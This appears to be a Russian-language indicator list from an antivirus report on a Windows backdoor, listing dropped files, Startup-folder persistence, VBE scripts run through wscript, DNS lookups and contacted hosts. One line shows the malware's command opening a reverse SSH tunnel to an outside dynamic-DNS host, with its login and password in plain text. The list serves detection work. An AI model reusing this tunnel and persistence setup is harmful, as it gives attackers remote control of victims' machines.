Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\DiskDoctor.lnk
- C:\Data.Msi\System.exe -ssh -R 61374:127.0.0.1:2103 -N adminsox.zapto.org -l httpd -pw muiema123qwe
- C:\Data.Msi\cssrs.exe -d -t -l -p2103 -a
- <SYSTEM32>\wscript.exe "C:\Data.Msi\alg.vbe"
- <SYSTEM32>\wscript.exe "C:\Data.Msi\startup.vbe"
- %PROGRAM_FILES%\picture\picture album\Uninstall.exe
- C:\Data.Msi\System.exe
- C:\Data.Msi\pic.url
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\goaldtrinitonusw[1]
- <LS_APPDATA>\PUTTY.RND
- %PROGRAM_FILES%\picture\picture album\Uninstall.ini
- C:\Data.Msi\alg.vbe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- C:\Data.Msi\cssrs.exe
- C:\Data.Msi\DiskDoctor.lnk
- C:\Data.Msi\startup.vbe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 's9##.##otobucket.com':80
- 'ad####ox.zapto.org':22
- 'localhost':1035
- s9##.##otobucket.com/albums/ac244/goaldtrinitonusw/?al#################
- DNS ASK s9##.##otobucket.com
- DNS ASK ad####ox.zapto.org
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''